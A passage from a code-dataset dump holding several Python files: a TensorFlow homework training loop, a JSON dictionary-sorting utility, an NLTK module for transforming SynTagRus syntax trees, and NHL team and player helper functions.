tf.one_hot(t, 10))\n\ntrain_ds = tf.data.Dataset.zip((train_seq, train_label))\ntrain_ds = train_ds.batch(128)\ntrain_ds = train_ds.shuffle(buffer_size=128)\n\ntest_seq = tf.data.Dataset.from_tensor_slices(test_seq)\ntest_seq = test_seq.map(onehotify)\n\ntest_label = tf.data.Dataset.from_tensor_slices(test_label)\ntest_label = test_label.map(lambda t: tf.one_hot(t, 10))\n\ntest_ds = tf.data.Dataset.zip((test_seq, test_label))\ntest_ds = test_ds.batch(128)\ntest_ds = test_ds.shuffle(buffer_size=128)\n\n# Custom Model\nclass MyModel(tf.keras.Model):\n\n def __init__(self):\n super(MyModel, self).__init__()\n self.dense1 = SimpleDense(256, activation = tf.nn.sigmoid)\n self.dense2 = SimpleDense(256, activation = tf.nn.sigmoid)\n self.out = SimpleDense(10, activation = tf.nn.softmax)\n\n def call(self, inputs):\n x = self.dense1(inputs)\n x = self.dense2(x)\n out = self.out(x)\n return out\n\n\n\n# Custom Layer\nclass SimpleDense(tf.keras.layers.Layer):\n\n def __init__(self, units, activation):\n super(SimpleDense, self).__init__()\n self.units = units\n self.activation = activation\n\n def build(self, input_shape):\n self.w = self.add_weight(shape=(input_shape[-1], self.units),\n initializer='random_normal',\n trainable=True)\n self.b = self.add_weight(shape=(self.units,),\n initializer='random_normal',\n trainable=True)\n\n def call(self, inputs):\n x = tf.matmul(inputs, self.w) + self.b\n x = self.activation(x)\n return x\n\ndef train_step(model, input, target, loss_function, optimizer):\n # loss_object and optimizer_object are instances of respective tensorflow classes\n with tf.GradientTape() as tape:\n prediction = model(input)\n loss = loss_function(target, prediction)\n gradients = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return loss\n\ndef test(model, test_data, loss_function):\n # test over complete test data\n\n test_accuracy_aggregator = []\n test_loss_aggregator = []\n\n for (input, target) in test_data:\n prediction = model(input)\n sample_test_loss = loss_function(target, prediction)\n sample_test_accuracy = np.argmax(target, axis=1) == np.argmax(prediction, axis=1)\n sample_test_accuracy = np.mean(sample_test_accuracy)\n test_loss_aggregator.append(sample_test_loss.numpy())\n test_accuracy_aggregator.append(np.mean(sample_test_accuracy))\n\n test_loss = tf.reduce_mean(test_loss_aggregator)\n test_accuracy = 
tf.reduce_mean(test_accuracy_aggregator)\n\n return test_loss, test_accuracy\n\n#tf.keras.backend.clear_session()\n\n#For showcasing we only use a subset of the training and test data (generally use all of the available data!)\ntrain_dataset = train_ds\ntest_dataset = test_ds\n\n### Hyperparameters\nnum_epochs = 10\nlearning_rate = 0.1\n\n# Initialize the model.\nmodel = MyModel()\n# Initialize the loss: categorical cross entropy. Check out 'tf.keras.losses'.\ncross_entropy_loss = tf.keras.losses.CategoricalCrossentropy()\n# Initialize the optimizer: SGD with default parameters. Check out 'tf.keras.optimizers'\noptimizer = tf.keras.optimizers.SGD(learning_rate)\n\n# Initialize lists for later visualization.\ntrain_losses = []\n\ntest_losses = []\ntest_accuracies = []\n\n#testing once before we begin\ntest_loss, test_accuracy = test(model, test_dataset, cross_entropy_loss)\ntest_losses.append(test_loss)\ntest_accuracies.append(test_accuracy)\n\n#check how model performs on train data once before we begin\ntrain_loss, _ = test(model, train_dataset, cross_entropy_loss)\ntrain_losses.append(train_loss)\n\n# We train for num_epochs epochs.\nfor epoch in range(num_epochs):\n print(f'Epoch: {str(epoch)} starting with accuracy {test_accuracies[-1]}')\n\n #training (and checking in with training)\n epoch_loss_agg = []\n for input,target in train_dataset:\n train_loss = train_step(model, input, target, cross_entropy_loss, optimizer)\n epoch_loss_agg.append(train_loss)\n\n #track training loss\n train_losses.append(tf.reduce_mean(epoch_loss_agg))\n\n #testing, so we can track accuracy and test loss\n test_loss, test_accuracy = test(model, test_dataset, cross_entropy_loss)\n test_losses.append(test_loss)\n test_accuracies.append(test_accuracy)\n\nimport matplotlib.pyplot as plt\n\n# Visualize accuracy and loss for training and test data.\nplt.figure()\nline1, = plt.plot(train_losses)\nline2, = plt.plot(test_losses)\nline3, = plt.plot(test_accuracies)\nplt.xlabel(\"Training steps\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend((line1,line2, line3),(\"training\",\"test\", \"test accuracy\"))\nplt.show()\n","repo_name":"tjayada/iANNwTF","sub_path":"hw_03-Genome.py","file_name":"hw_03-Genome.py","file_ext":"py","file_size_in_byte":5633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12617085642","text":"import json\n\n\ndef load_json(addr):\n with open(addr, \"r\") as load_f:\n load_data = json.load(load_f)\n return load_data\n\n\ndef sort_dict(a_dict, option=\"value\"):\n if option in [\"value\", \"key\"]:\n result_dict = {}\n if option == \"key\":\n temp_list = list(a_dict.keys())\n temp_list.sort()\n for item in temp_list:\n result_dict[item] = a_dict[item]\n else:\n temp_value_list = list(a_dict.values())\n temp_key_list = list(a_dict.keys())\n for i in range(len(temp_key_list)):\n for j in range(len(temp_key_list) - i - 1):\n if temp_value_list[j] > temp_value_list[j + 1]:\n temp = temp_key_list[j]\n temp_key_list[j] = temp_key_list[j + 1]\n temp_key_list[j + 1] = temp\n temp = temp_value_list[j]\n temp_value_list[j] = temp_value_list[j + 1]\n temp_value_list[j + 1] = temp\n for key, value in zip(temp_key_list, temp_value_list):\n result_dict[key] = value\n return result_dict\n raise ValueError(option + \" is not in option list——[key,value]\")\n\n\ndef get_repeat_size(addr):\n dict_all_new = load_json(addr)\n dict_repeat_size = {}\n\n final_dict = {}\n for dict_name in dict_all_new:\n if len(dict_all_new[dict_name]) == 1:\n continue\n 
tmp_img = []\n tmp_size = 0\n for img in dict_all_new[dict_name]:\n tmp_size = img[\"size\"]\n if img[\"img\"] not in tmp_img:\n tmp_img.append(img[\"img\"])\n if tmp_size == 0 or len(tmp_img) == 1:\n continue\n tmp_img.sort()\n name = \"\"\n for name_tmp in tmp_img:\n name = name + name_tmp + \"_\"\n if name_tmp not in dict_repeat_size:\n dict_repeat_size[name_tmp] = tmp_size\n else:\n dict_repeat_size[name_tmp] = dict_repeat_size[name_tmp] + tmp_size\n if name not in final_dict:\n final_dict[name] = tmp_size\n else:\n final_dict[name] = final_dict[name] + tmp_size\n if len(dict_all_new[dict_name]) > 3:\n print(final_dict[name], dict_all_new[dict_name])\n dict_order = sort_dict(final_dict)\n for i in dict_order:\n print(\"repeat\", i, dict_order[i])\n print(dict_repeat_size)\n return 0\n\n\nif __name__ == \"__main__\":\n addr = \"./input/DATA/all_hash_dict.txt\"\n","repo_name":"fwyc0573/PreliminaryBooster","sub_path":"booster/refactorer/util/get_repeat_size.py","file_name":"get_repeat_size.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"26211129759","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSynTagRus Tree Transformation Module\nalexluu@brandeis.edu\n\"\"\"\n\nfrom nltk.tree import Tree, ParentedTree\nfrom copy import deepcopy\nimport re\nfrom collections import defaultdict\n\ni_pattern = re.compile(r'^\\d+$')\n\ndef analyze_label(label):\n \"\"\" -> dict of syntactic and functional tags \"\"\"\n output = dict()\n temp = label.split('-')\n output['syntactic'] = temp[0]\n output['functional'] = set(temp[1:])\n return output\n\ndef get_label_positions(t,order=\"preorder\"):\n \"\"\"\n order: \"preorder\"/\"postprder\"/\"bothorder\"/\"leaves\"\n \"\"\"\n output = t.treepositions(order)\n leaves = t.treepositions('leaves')\n for p in leaves:\n output.remove(p)\n return output\n\n############################################################\n\ndef change_label(t,f_tag,s_tag):\n \"\"\" change s_tag of all nodes having f_tag \"\"\"\n # set of positions of all labels in tree\n l_pos = get_label_positions(t)\n for p in l_pos:\n l = t[p].label()\n f_tags = analyze_label(l)['functional']\n if f_tag in f_tags:\n t[p].set_label(s_tag+''.join(l.partition('-')[1:]))\n\n############################################################\n\ndef find_first_wh_leaf(t):\n \"\"\" -> 1st WH leaf in a WH phrase t \"\"\"\n leaves = t.treepositions('leaves')\n for i in range(len(leaves)):\n f_tags = analyze_label(t[leaves[i][:-1]].label())\\\n ['functional']\n if 'WH' in f_tags:\n return i\n\ndef find_highest_unary(t,p): #p: treeposition\n \"\"\" -> highest unary node dominating p \"\"\"\n output = p\n if len(p): # p!=tuple()\n for i in range(len(p)):\n if len(t[p[:-(i+1)]])>1:\n break\n if i>0:\n output = p[:-i]\n return output \n\ndef find_wh_phrase(t):\n wh_index = find_first_wh_leaf(t)\n if isinstance(wh_index,int):\n if wh_index==0: # handle trees[1331]\n wh_pos = t.leaf_treeposition(0)[:-2]\n else:\n wh_pos = t.treeposition_spanning_leaves(0,wh_index+1)\n return find_highest_unary(t,wh_pos)\n return \"No WH leaf!\"\n \n\ndef wh_movement(t,pos):\n cpos = find_wh_phrase(t[pos])\n if cpos==\"No WH leaf!\":\n pass\n elif not cpos:\n pass\n else: \n ctemp = deepcopy(t[pos][cpos])\n clabel = analyze_label(ctemp.label())\n fs = clabel['functional']\n if all(not i_pattern.match(f) for f in fs):\n index = '-' + ''.join(str(i) for i in pos) + \\\n '1' + ''.join(str(i) for i in cpos)\n label = 
clabel['syntactic'] + index\n t[pos][cpos] = Tree(t[pos][cpos].label(),\n ['*T*'+index])\n else:\n label = ctemp.label()\n del t[pos][cpos]\n ctemp.set_label('WH' + label)\n temp = deepcopy(t[pos])\n label = temp.label().partition('-')\n t[pos] = Tree('SBAR'+label[1]+label[2],[\n ctemp,\n temp\n ])\n\n############################################################\n\ndef get_relative_nodes(t,order='postorder'):\n output = list()\n nodes = get_label_positions(t,order)\n for n in nodes:\n f_tags = analyze_label(t[n].label())['functional']\n if 'RLT' in f_tags or 'SBO' in f_tags:\n output.append(n)\n return output\n\ndef get_relative_structures(t,order='postorder'):\n \"\"\" Ignore null elements \"\"\"\n output = list()\n nodes = get_label_positions(t,order)\n for n in nodes:\n if t[n].height()>2: # t contains more than just leaves\n f_tags = analyze_label(t[n].label())['functional']\n if 'RLT' in f_tags or 'SBO' in f_tags:\n output.append(n)\n return output\n\ndef transform_relative_structures(t):\n rlt_structures = get_relative_structures(t)\n for n in rlt_structures:\n wh_movement(t,n)\n\n############################################################\n\ndef c_command(node1, node2): #node1, node2: tree positions\n return (node1[:-1]==node2[:len(node1[:-1])]\n and node1[-1]!=node2[len(node1[:-1])])\n\ndef merge_nodes(t,parent): #parent: tree position\n p_label =t[parent].label().partition('-') \n if len(p_label)==3:\n for c in t[parent]:\n if isinstance(c,Tree):\n if p_label[0].startswith(analyze_label\\\n (c.label())['syntactic']):\n c.set_label(c.label()+'-'+p_label[2])\n new_index = parent[-1]+len(t[parent])\n for c in t[parent][::-1]:\n t[parent[:-1]].insert(parent[-1],c)\t\n del t[parent[:-1]][new_index] \n\n############################################################\n\ndef np2p_leaves(tree):\n return set([p for p in tree.treepositions('leaves')\n if tree[p].startswith('*NP2P*')])\n\ndef np2p_coindexed_node(tree,leaf): #leaf: tree position\n coindex = tree[leaf].partition('-')[2]\n for p in get_label_positions(tree):\n if coindex in analyze_label(tree[p].label())\\\n ['functional']:\n return p\n\ndef np2p_root(node,leaf): #node, leaf: tree positions\n for i in range(len(node)):\n if i==len(leaf) or node[i]!=leaf[i]:\n break\n return node[:i]\n\ndef get_np2p_roots(t,order='postorder'): # only problematic ones\n np2p_roots = defaultdict(list)\n for l in np2p_leaves(t):\n n = np2p_coindexed_node(t,l)\n if not c_command(n,l):\n np2p_roots[np2p_root(n,l)].append((t[n].label(),\n t[l]))\n nodes = get_label_positions(t,order)\n return [n for n in nodes if n in np2p_roots],np2p_roots\n\ndef order_labels(tree,labels,order='preorder'): #labels: list of labels of coindexed nodes\n np2p_coindexed_nodes = dict()\n for p in get_label_positions(tree):\n if tree[p].label() in labels:\n np2p_coindexed_nodes[p] = tree[p].label() \n nodes = get_label_positions(tree,order)\n ordered = [n for n in nodes if n in np2p_coindexed_nodes]\n return [np2p_coindexed_nodes[p] for p in ordered]\n\n\ndef transform_np2p_structures(t): #to satisfy c-command condition\n ordered, targets = get_np2p_roots(t)\n for p in ordered:\n tree = t[p]\n labels = [x[0] for x in targets[p]]\n ordered_labels = order_labels(tree,labels)\n for l in labels:\n for pp in get_label_positions(tree):\n if tree[pp].label()==l:\n break\n for i in range(len(pp)-1):\n merge_nodes(tree,pp[:-(i+1)])\n\n############################################################\n\ndef transform_coordinative_structures(tree):\n flag = False\n nodes = 
get_label_positions(tree,order='postorder')\n for n in nodes[:-1]:\n s_tag = analyze_label(tree[n].label())['syntactic']\n f_tags = analyze_label(tree[n].label())['functional']\n pf_tags = set()\n if len(n): #if n has parent\n ps_tag = analyze_label(tree[n[:-1]].label())\\\n ['syntactic']\n pf_tags = analyze_label(tree[n[:-1]].label())\\\n ['functional']\n if ('CRC' in f_tags)or \\\n (('CRD' in f_tags) and ('CRD' in pf_tags) and\n s_tag == ps_tag) or \\\n (('SCR' in f_tags) and ('SCR' in pf_tags) and\n s_tag == ps_tag):\n merge_nodes(tree,n)\n flag = True\n break\n if flag:\n transform_coordinative_structures(tree)\n return flag\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"luutuntin/SynTagRus_DS2PS","sub_path":"syntagrus_transformation.py","file_name":"syntagrus_transformation.py","file_ext":"py","file_size_in_byte":7516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6399086139","text":"import datetime\nimport time\nimport itertools\nimport os\nimport numpy as np\nimport platform\nimport math\nimport inspect\nimport csv\nimport copy\nimport random\nimport copy\nimport warnings\nimport json\nimport gspread\nimport cfscrape\nimport signal\nimport scipy.stats as st\nfrom oauth2client.client import SignedJwtAssertionCredentials\nfrom collections import defaultdict\nfrom nhl_defines import *\nfrom shutil import copyfile\nfrom inspect import currentframe, getframeinfo\n\nif platform.system() == 'Darwin':\n\timport matplotlib\n\timport matplotlib.pyplot as plt\n\ndef generate_long_name():\n\tlong_name = {}\n\tlong_name['ANA'] = 'Anaheim Ducks'\n\tlong_name['ARI'] = 'Arizona Coyotes'\n\tlong_name['BOS'] = 'Boston Bruins'\n\tlong_name['BUF'] = 'Buffalo Sabres'\n\tlong_name['CAR'] = 'Carolina Hurricanes'\n\tlong_name['CBJ'] = 'Columbus Blue Jackets'\n\tlong_name['CGY'] = 'Calgary Flames'\n\tlong_name['CHI'] = 'Chicago Blackhawks'\n\tlong_name['COL'] = 'Colorado Avalanche'\n\tlong_name['DAL'] = 'Dallas Stars'\n\tlong_name['DET'] = 'Detroit Red Wings'\n\tlong_name['EDM'] = 'Edmonton Oilers'\n\tlong_name['FLA'] = 'Florida Panthers'\n\tlong_name['LAK'] = 'Los Angeles Kings'\n\tlong_name['MIN'] = 'Minnesota Wild'\n\tlong_name['MTL'] = 'Montreal Canadiens'\n\tlong_name['NJD'] = 'New Jersey Devils'\n\tlong_name['NSH'] = 'Nashville Predators'\n\tlong_name['NYI'] = 'New York Islanders'\n\tlong_name['NYR'] = 'New York Rangers'\n\tlong_name['OTT'] = 'Ottawa Senators'\n\tlong_name['PHI'] = 'Philadelphia Flyers'\n\tlong_name['PIT'] = 'Pittsburgh Penguins'\n\tlong_name['SJS'] = 'San Jose Sharks'\n\tlong_name['STL'] = 'St. 
Louis Blues'\n\tlong_name['TBL'] = 'Tampa Bay Lightning'\n\tlong_name['TOR'] = 'Toronto Maple Leafs'\n\tlong_name['VAN'] = 'Vancouver Canucks'\n\tlong_name['VGK'] = 'Vegas Golden Knights'\n\tlong_name['WPG'] = 'Winnipeg Jets'\n\tlong_name['WSH'] = 'Washington Capitals'\n\treturn long_name\n\ndef generate_all_teams_dict(return_type):\n\toutput = {}\n\toutput['ANA'] = return_type\n\toutput['ARI'] = return_type\n\toutput['BOS'] = return_type\n\toutput['BUF'] = return_type\n\toutput['CAR'] = return_type\n\toutput['CBJ'] = return_type\n\toutput['CGY'] = return_type\n\toutput['CHI'] = return_type\n\toutput['COL'] = return_type\n\toutput['DAL'] = return_type\n\toutput['DET'] = return_type\n\toutput['EDM'] = return_type\n\toutput['FLA'] = return_type\n\toutput['LAK'] = return_type\n\toutput['MIN'] = return_type\n\toutput['MTL'] = return_type\n\toutput['NJD'] = return_type\n\toutput['NSH'] = return_type\n\toutput['NYI'] = return_type\n\toutput['NYR'] = return_type\n\toutput['OTT'] = return_type\n\toutput['PHI'] = return_type\n\toutput['PIT'] = return_type\n\toutput['SJS'] = return_type\n\toutput['STL'] = return_type\n\toutput['TBL'] = return_type\n\toutput['TOR'] = return_type\n\toutput['VAN'] = return_type\n\toutput['VGK'] = return_type\n\toutput['WPG'] = return_type\n\toutput['WSH'] = return_type\n\treturn output\n\ndef get_daily_fo_url(team_id):\n\tdaily_fo_url_dict = {}\n\tdaily_fo_url_dict['ANA'] = \"https://www.dailyfaceoff.com/teams/anaheim-ducks/line-combinations/\"\n\tdaily_fo_url_dict['ARI'] = \"https://www.dailyfaceoff.com/teams/arizona-coyotes/line-combinations/\"\n\tdaily_fo_url_dict['BOS'] = \"https://www.dailyfaceoff.com/teams/boston-bruins/line-combinations/\"\t\n\tdaily_fo_url_dict['BUF'] = \"https://www.dailyfaceoff.com/teams/buffalo-sabres/line-combinations/\"\n\tdaily_fo_url_dict['CAR'] = \"https://www.dailyfaceoff.com/teams/carolina-hurricanes/line-combinations/\"\n\tdaily_fo_url_dict['CBJ'] = \"https://www.dailyfaceoff.com/teams/columbus-blue-jackets/line-combinations/\"\n\tdaily_fo_url_dict['CGY'] = \"https://www.dailyfaceoff.com/teams/calgary-flames/line-combinations/\"\n\tdaily_fo_url_dict['CHI'] = \"https://www.dailyfaceoff.com/teams/chigaco-blackhawks/line-combinations/\"\n\tdaily_fo_url_dict['COL'] = \"https://www.dailyfaceoff.com/teams/colorado-avalanche/line-combinations/\"\n\tdaily_fo_url_dict['DAL'] = \"https://www.dailyfaceoff.com/teams/dallas-stars/line-combinations/\"\n\tdaily_fo_url_dict['DET'] = \"https://www.dailyfaceoff.com/teams/detroit-red-wings/line-combinations/\"\n\tdaily_fo_url_dict['EDM'] = \"https://www.dailyfaceoff.com/teams/edmonton-oilers/line-combinations/\"\n\tdaily_fo_url_dict['FLA'] = \"https://www.dailyfaceoff.com/teams/florida-panthers/line-combinations/\"\n\tdaily_fo_url_dict['LAK'] = \"https://www.dailyfaceoff.com/teams/los-angeles-kings/line-combinations/\"\n\tdaily_fo_url_dict['MIN'] = \"https://www.dailyfaceoff.com/teams/minnesota-wild/line-combinations/\"\n\tdaily_fo_url_dict['MTL'] = \"https://www.dailyfaceoff.com/teams/montreal-canadiens/line-combinations/\"\n\tdaily_fo_url_dict['NJD'] = \"https://www.dailyfaceoff.com/teams/new-jersey-devils/line-combinations/\"\n\tdaily_fo_url_dict['NSH'] = \"https://www.dailyfaceoff.com/teams/nashville-predators/line-combinations/\"\n\tdaily_fo_url_dict['NYI'] = \"https://www.dailyfaceoff.com/teams/new-york-islanders/line-combinations/\"\n\tdaily_fo_url_dict['NYR'] = \"https://www.dailyfaceoff.com/teams/new-york-rangers/line-combinations/\"\n\tdaily_fo_url_dict['OTT'] = 
\"https://www.dailyfaceoff.com/teams/ottawa-senators/line-combinations/\"\n\tdaily_fo_url_dict['PHI'] = \"https://www.dailyfaceoff.com/teams/philadelphia-flyers/line-combinations/\"\n\tdaily_fo_url_dict['PIT'] = \"https://www.dailyfaceoff.com/teams/pittsburgh-penguins/line-combinations/\"\n\tdaily_fo_url_dict['SJS'] = \"https://www.dailyfaceoff.com/teams/san-jose-sharks/line-combinations/\"\n\tdaily_fo_url_dict['STL'] = \"https://www.dailyfaceoff.com/teams/st-louis-blues/line-combinations/\"\n\tdaily_fo_url_dict['TBL'] = \"https://www.dailyfaceoff.com/teams/tampa-bay-lightning/line-combinations/\"\n\tdaily_fo_url_dict['TOR'] = \"https://www.dailyfaceoff.com/teams/toronto-maple-leafs/line-combinations/\"\n\tdaily_fo_url_dict['VAN'] = \"https://www.dailyfaceoff.com/teams/vancouver-canucks/line-combinations/\"\n\tdaily_fo_url_dict['VGK'] = \"https://www.dailyfaceoff.com/teams/vegas-golden-knights/line-combinations/\"\n\tdaily_fo_url_dict['WPG'] = \"https://www.dailyfaceoff.com/teams/winnipeg-jets/line-combinations/\"\n\tdaily_fo_url_dict['WSH'] = \"https://www.dailyfaceoff.com/teams/washington-capitals/line-combinations/\"\n\treturn daily_fo_url_dict[team_id]\n\ndef get_home_team_advantage(t_db,ht_id,at_id=None):\n\tht = t_db[ht_id]\n\tht_rel_pcg = ht.home_p_pcg/(ht.home_p_pcg+ht.away_p_pcg)\n\tif at_id == None:\t\n\t\treturn ht_rel_pcg\n\telse:\n\t\tat = t_db[at_id]\n\t\tat_rel_pcg = at.home_p_pcg/(at.home_p_pcg+at.away_p_pcg)\n\t\treturn ht_rel_pcg/(1-at_rel_pcg)\n\ndef get_days_rested(team_id,simulation_param):\n\t# For now, only takes the most recent rest into account.\n\tmaximum_rest = 3 # number of days after the team is fully healthy/rested.\n\ti = 0\n\tfound = False\n\tdays_rested = maximum_rest\n\twhile i < maximum_rest and found == False:\n\t\tgames_on_date = simulation_param['databases']['season_schedule'][get_previous_day(simulation_param['simulation_date'],i+1)] # i+1 since there is not need to check the same day as the game.\n\t\tfor game in games_on_date:\n\t\t\tif team_id in game:\n\t\t\t\tdays_rested = i\n\t\t\t\tfound = True\n\t\ti += 1\n\treturn days_rested\n\ndef is_skipp_year(year):\n\tif ((year%4) == 0) and ((year%400) == 0):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef get_previous_day(start_date,number_of_days):\n\t# This is very ugly and should be done by using datetime.dateime libraray instead.\n\t# Date needs to be in str-format: 'YYYY-MM-DD'\n\tif number_of_days == 0:\n\t\treturn start_date\n\telse:\n\t\tdatestr = start_date\n\t\ti = 0\n\t\twhile i < number_of_days:\n\t\t\t[year,month,day] = datestr.split('-')\n\t\t\tif int(day) > 1:\n\t\t\t\tday = int(day)-1\n\t\t\telse:\n\t\t\t\tif int(month) in [2,4,6,8,9,11]:\n\t\t\t\t\tmonth = int(month)-1\n\t\t\t\t\tday = 31\n\t\t\t\telif int(month) in [5,7,10,12]:\n\t\t\t\t\tmonth = int(month)-1\n\t\t\t\t\tday = 30\n\t\t\t\telif int(month) == 3:\n\t\t\t\t\tmonth = int(month)-1\n\t\t\t\t\tif is_skipp_year:\n\t\t\t\t\t\tday = 29\n\t\t\t\t\telse:\n\t\t\t\t\t\tday = 28\n\t\t\t\telse:\n\t\t\t\t\tyear = int(year)-1\n\t\t\t\t\tmonth = 12\n\t\t\t\t\tday = 31\n\t\t\tdatestr = str(str(year) + '-' + str(month) + '-' + str(day))\n\t\t\ti += 1\n\t\treturn datestr\n\ndef get_delta_days(date0,date1):\n\t# Assumes 'YYYY-MM-DD'\n\t[year0,month0,day0] = date0.split('-')\n\t[year1,month1,day1] = date1.split('-')\n\n\td0 = datetime.date(int(year0),int(month0),int(day0))\n\td1 = datetime.date(int(year1),int(month1),int(day1))\n\n\tdelta = d1-d0\n\treturn delta.days\n\ndef get_long_name(team_id):\n\ttmp = generate_long_name()\n\treturn 
tmp[team_id]\n\ndef get_team_id(long_name):\n\ttmp = generate_long_name()\n\tfor team_id in tmp:\n\t\tif tmp[team_id] == long_name:\n\t\t\treturn team_id\n\ndef get_team(team_db,team_id):\n\treturn team_db[team_id]\n\ndef get_player(simulation_param,player_id):\n\tif player_id in ACTIVE_GOALIES:\n\t\treturn get_goalie(simulation_param['databases']['goalie_db'],player_id)\n\telif player_id in ACTIVE_SKATERS:\n\t\treturn get_skater(simulation_param['databases']['skater_db'],player_id)\n\telse:\n\t\traise ValueError(player_id + ' not included in Goalie or Skater databse.')\n\ndef get_skater(skater_db,player_id):\n\treturn skater_db[player_id]\n\ndef get_goalie(goalie_db,player_id):\n\treturn goalie_db[player_id]\n\ndef print_progress(i,N,t0,step=10):\n\ttime_unit = ['min','min']\n\tprinted = False\n\tif ((i%(N/(100/step))) == 0) and (i>0):\n\t\tt_elp = (time.time() - t0)/60\n\t\tt_left = t_elp*((N/i) - 1)\n\t\tif t_elp < 1.0:\n\t\t\tt_elp *= 60\n\t\t\ttime_unit[0] = 'sec'\n\t\tif t_left < 1.0:\n\t\t\tt_left *= 60\n\t\t\ttime_unit[1] = 'sec'\n\t\tn = datetime.datetime.now()\n\t\tprint_n = str(datetime.time(n.hour,n.minute,n.second))\n\t\tif time_unit[1] == 'sec':\n\t\t\teta = n+datetime.timedelta(seconds=t_left)\n\t\telse:\n\t\t\teta = n+datetime.timedelta(minutes=t_left)\n\t\tprint_eta = str(datetime.time(eta.hour,eta.minute,eta.second))\n\t\tprint('{0}: {1:.0f} % completed. Time elapsed: {2:.0f} {3}. Estimated time left: {4:.0f} {5} (ETA: {6}).'.format(print_n,100*i/N,t_elp,time_unit[0],t_left,time_unit[1],print_eta))\n\t\tprinted = True\n\treturn printed\n\ndef val_in_list(val,lst):\n\t''' Returns the number of times the value val appears in the list lst. '''\n\to = 0\n\tfor vl in lst:\n\t\tif vl == val: \n\t\t\to += 1\n\treturn o\n\ndef get_list_pcg(lst):\n\tnew_lst = []\n\tfor i in range(len(lst)):\n\t\tnew_lst.append(100*lst[i]/sum(lst))\n\treturn new_lst\n\ndef get_time_str_from_sec(seconds):\n\tm = seconds//60\n\ts = seconds%60\n\tif m < 10:\n\t\tm = str('0'+str(m))\n\telse:\n\t\tm = str(m)\n\n\tif s < 10:\n\t\ts = str('0'+str(s))\n\telse:\n\t\ts = str(s)\n\t\n\treturn str(m + ':' + s)\n\ndef get_position_for_player(position):\n\tif (position == 'L') or (position == 'C') or (position == 'R'):\n\t\tposition = 'F'\n\treturn position\n\ndef generate_player_id(raw_str,team_id):\n\tplayer_id = str(raw_str).upper().replace(' ','_')\n\tplayer_id = player_id.replace('.','_')\n\tplayer_id = player_id.replace(\"'\",'')\n\n\t# Handle special cases\n\tif player_id == 'ALEXANDER_NYLANDER':\n\t\tplayer_id = 'ALEX_NYLANDER'\n\n\tif (player_id == 'SEBASTIAN_AHO') and (team_id != 'CAR'):\n\t\tplayer_id = 'SEBASTIAN_AHO2'\n\n\treturn player_id\n\ndef is_this_aho(raw_player_str,raw_team_str):\n\tplayer_id = str(raw_player_str).upper().replace(' ','_')\n\tplayer_id = player_id.replace('.','_')\n\tplayer_id = player_id.replace(\"'\",'')\n\tif player_id == 'SEBASTIAN_AHO':\n\t\tbool_a = True\n\t\tif raw_team_str == 'CAR':\n\t\t\tplayer_id = 'SEBASTIAN_AHO'\n\t\telse:\n\t\t\tplayer_id = 'SEBASTIAN_AHO2'\n\telse:\n\t\tbool_a = False\n\t\tplayer_id = 'N/A'\n\treturn [bool_a,player_id]\n\ndef generate_player_and_team_id(raw_player_str,raw_team_str=None,is_relative=False):\n\tplayer_id = str(raw_player_str).upper().replace(' ','_')\n\tplayer_id = player_id.replace('.','_')\n\tplayer_id = player_id.replace(\"'\",'')\n\n\t#@TODO: This should REALLY not be raw_team_str!\n\tif (player_id == 'SEBASTIAN_AHO') and (raw_team_str != 'CAR'):\n\t\tplayer_id = 'SEBASTIAN_AHO2'\n\t\treturn [player_id, 'NYI']\n\n\t# Handle 
special cases\n\tif player_id == 'ALEXANDER_NYLANDER':\n\t\tplayer_id = 'ALEX_NYLANDER'\n\t\n\tif raw_team_str == None:\n\t\tteam_id = 'MAKE_BELIEVES'\n\telse:\n\t\t# Get team-id\n\t\tmanually_checked_players = set()\n\t\tmanually_checked_players.add('MARCO_SCANDELLA')\n\t\tmanually_checked_players.add('ILYA_KOVALCHUK')\n\t\tmanually_checked_players.add('VLADISLAV_NAMESTNIKOV')\n\t\tnew_team = {}\n\t\t#new_team['VLADISLAV_NAMESTNIKOV'] = 'OTT'\n\t\tnew_team['ERIK_GUDBRANSON'] = 'ANA'\n\t\tnew_team['ANDREAS_MARTINSEN'] = 'PTI'\n\t\tnew_team['BRENDAN_PERLINI'] = 'DET'\n\t\tnew_team['JACOB_DE_LA_ROSE'] = 'STL'\n\t\tnew_team['ROBBY_FABBRI'] = 'DET'\n\t\tnew_team['CHANDLER_STEPHENSON'] = 'VGK'\n\t\tnew_team['NICK_SHORE'] = 'WPG'\n\t\tnew_team['TAYLOR_HALL'] = 'ARI'\n\t\tnew_team['STEFAN_NOESEN'] = 'SJS'\n\t\tnew_team['MARCO_SCANDELLA'] = 'STL'\n\t\tnew_team['MIKE_REILLY'] = 'OTT'\n\t\t#new_team['ILYA_KOVALCHUK'] = 'MTL'\n\t\tnew_team['MICHAEL_FROLIK'] = 'BUF'\n\t\tnew_team['JACK_CAMPBELL'] = 'TOR'\n\t\tnew_team['KYLE_CLIFFORD'] = 'TOR'\n\t\tnew_team['TREVOR_MOORE'] = 'LAK'\n\t\tnew_team['NICK_SEELER'] = 'CHI'\n\t\tnew_team['JASON_ZUCKER'] = 'PIT'\n\t\tnew_team['ALEX_GALCHENYUK'] = 'MIN'\n\t\tnew_team['ANDY_GREENE'] = 'NYI'\n\t\tnew_team['BRENDEN_DILLON'] = 'WSH'\n\t\tnew_team['TYLER_TOFFOLI'] = 'VAN'\n\t\tnew_team['JULIEN_GAUTHIER'] = 'NYR'\n\t\tnew_team['BLAKE_COLEMAN'] = 'TBL'\n\t\tnew_team['ALEC_MARTINEZ'] = 'VGK'\n\t\tnew_team['DYLAN_DEMELO'] = 'WPG'\n\t\tnew_team['TIM_SCHALLER'] = 'LAK'\n\t\tnew_team['JAYCE_HAWRYLUK'] = 'OTT'\n\t\tnew_team['DENIS_MALGIN'] = 'TOR'\n\t\tnew_team['CODY_EAKIN'] = 'WPG'\n\t\tnew_team['DANTON_HEINEN'] = 'ANA'\n\t\tnew_team['NICK_RITCHIE'] = 